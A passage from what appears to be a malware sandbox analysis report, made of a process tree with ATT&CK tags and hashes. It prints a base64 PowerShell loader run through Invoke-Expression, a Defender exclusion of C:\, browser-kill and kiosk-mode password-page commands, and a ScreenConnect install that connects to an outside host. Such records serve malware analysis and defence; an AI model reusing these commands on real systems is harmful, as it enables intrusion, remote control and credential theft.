6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
PID:916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
PID:5728
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe"6⤵PID:7452
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e8f4de3ad1d.vbs7⤵PID:7588
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"8⤵PID:8056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381650101\32617d049f.exe"C:\Users\Admin\AppData\Local\Temp\10381650101\32617d049f.exe"6⤵PID:8220
-
-
C:\Users\Admin\AppData\Local\Temp\10381660101\910fd24d86.exe"C:\Users\Admin\AppData\Local\Temp\10381660101\910fd24d86.exe"6⤵PID:9056
-
-
C:\Users\Admin\AppData\Local\Temp\10381670101\322979be02.exe"C:\Users\Admin\AppData\Local\Temp\10381670101\322979be02.exe"6⤵PID:6820
-
-
C:\Users\Admin\AppData\Local\Temp\10381680101\da257bafc6.exe"C:\Users\Admin\AppData\Local\Temp\10381680101\da257bafc6.exe"6⤵PID:6980
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
PID:4836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- Kills process with taskkill
PID:7140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- Kills process with taskkill
PID:2592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
PID:4360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:4916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:5228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:7436
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2084 -initialChannelId {a33a0606-2c95-458f-af68-59bda276c450} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:5824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {9af0e8b0-8167-416c-ad64-dc06e42d3609} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:464
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3648 -prefsLen 25164 -prefMapHandle 3652 -prefMapSize 270279 -jsInitHandle 3656 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3664 -initialChannelId {45898c99-2509-4e18-b9d4-01cce1867385} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:8332
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3832 -prefsLen 27276 -prefMapHandle 3836 -prefMapSize 270279 -ipcHandle 3856 -initialChannelId {e071f18f-0e97-447f-b142-ef212ef41167} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:8392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4484 -prefsLen 34775 -prefMapHandle 4488 -prefMapSize 270279 -jsInitHandle 4472 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4512 -initialChannelId {d9cb9f05-b8e3-43c5-b54d-a91b684970ad} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:8724
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4968 -prefsLen 34824 -prefMapHandle 4972 -prefMapSize 270279 -ipcHandle 4980 -initialChannelId {bac4e024-09dd-49a3-9e77-1acf93cab59d} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:8324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5304 -prefsLen 32952 -prefMapHandle 5308 -prefMapSize 270279 -jsInitHandle 5312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5320 -initialChannelId {6047797e-2db3-4004-ad76-79e2b19ca727} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:11888
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5508 -prefsLen 32952 -prefMapHandle 5512 -prefMapSize 270279 -jsInitHandle 5516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5520 -initialChannelId {6699648d-2ffc-44a4-a2ff-b032e1b2a253} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:11936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5692 -prefsLen 32952 -prefMapHandle 5696 -prefMapSize 270279 -jsInitHandle 5700 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5708 -initialChannelId {6268716d-06d8-46c4-a73e-98c032303574} -parentPid 7436 -crashReporter "\\.\pipe\gecko-crash-server-pipe.7436" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:11992
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381690101\9852250675.exe"C:\Users\Admin\AppData\Local\Temp\10381690101\9852250675.exe"6⤵PID:9164
-
-
C:\Users\Admin\AppData\Local\Temp\10381700101\a012631816.exe"C:\Users\Admin\AppData\Local\Temp\10381700101\a012631816.exe"6⤵PID:11908
-
-
C:\Users\Admin\AppData\Local\Temp\10381710101\d467329ed2.exe"C:\Users\Admin\AppData\Local\Temp\10381710101\d467329ed2.exe"6⤵PID:4760
-
-
C:\Users\Admin\AppData\Local\Temp\10381720101\fd04e3bff8.exe"C:\Users\Admin\AppData\Local\Temp\10381720101\fd04e3bff8.exe"6⤵PID:7432
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381720101\fd04e3bff8.exe"7⤵PID:7816
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381730101\c676067d94.exe"C:\Users\Admin\AppData\Local\Temp\10381730101\c676067d94.exe"6⤵PID:8120
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10381730101\c676067d94.exe"7⤵PID:9996
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3520
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8DAD191259C6861A3AF4E4CBE039C0D6 C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIA9A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240651000 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4232
-
-
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4272
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 27D60B54332FC397D92376AAF0B906872⤵PID:392
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9D0F7E8165D39D620A557DD5BA8A3E10 E Global\MSI00002⤵PID:4408
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:4148
-
C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=17fa24ad-b218-4f2b-bc59-37df47dd924f&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"1⤵PID:5460
-
C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "1d6264b1-1ea5-4ed4-931b-5943b4cdebe3" "User"2⤵PID:1672
-
-
C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe"C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "117f9f4c-f663-4669-a9e9-2242ededa4fc" "System"2⤵PID:4468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:2548
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵PID:7568
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:7952
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:8300
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{0151554c-1b0e-4271-a505-48ece38b8685}\26409982-ecd6-4488-8672-81e093803f43.cmd"1⤵PID:9984
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10232
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10404
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10540
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10696
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10792
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:10904
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11064
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4536
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11280
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11400
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11488
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11584
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11728
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11848
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12000
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12120
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12244
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6276
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6608
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6588
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12404
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12524
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12664
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12804
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6900
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5036
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:4284
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9752
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:3236
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6172
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:5004
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6796
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4484
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2444
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:4408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7188
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7280
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:7368
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7456
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7556
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7732
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:7840
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7940
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8052
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5580
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:5648
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4496
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8204
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:8328
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8440
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8528
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8620
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:8720
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8832
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8920
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:9012
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9132
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:804
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9312
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9540
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:9636
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9748
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9848
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:9964
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10024
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10148
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:6056
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10328
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10416
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10520
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10684
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10804
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10892
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:10996
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11200
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5808
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11344
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11440
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11524
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:11660
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11760
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:11852
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11948
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6340
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6252
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12268
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12176
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12096
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6184
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6580
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:6492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12320
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12416
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:12856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12764
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12668
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:12556
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- Runs ping.exe
PID:3584
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:2016
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13000
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13188
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:4216
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13004
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:13304
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:856
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵PID:632
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3448
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 26409982-ecd6-4488-8672-81e093803f43 /f2⤵
- Modifies registry key
PID:13072
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵PID:10384
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Discovery
Peripheral Device Discovery
2Query Registry
7Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
214KB
MD5b5b830d6eceee194b1c78ae770f55db2
SHA146d223055ff1ec2c115978de97b4475fc70b3b48
SHA256fe41f4ea4fee2b467df525e9b438759f5534153120966a84738a91902eaab7a9
SHA512a2d0c52e01533d4a75939372549e0c392037b8f5fb6ce566f10626acc233b4af7c19d6dbcc7d6c028ad53c27f098c49244aaef52b5d1d3bf55f9db77f0b2857a
-
Filesize
673B
MD5b33dfc50d8dffa7cbfe5b088165a3232
SHA1d12c7a7426cad0c5e2933ff02bc10a152c8a1d7b
SHA25605fd879a17ea524af81b989de294570d3bf1912f6aae8ed70afab0fcb3d0f825
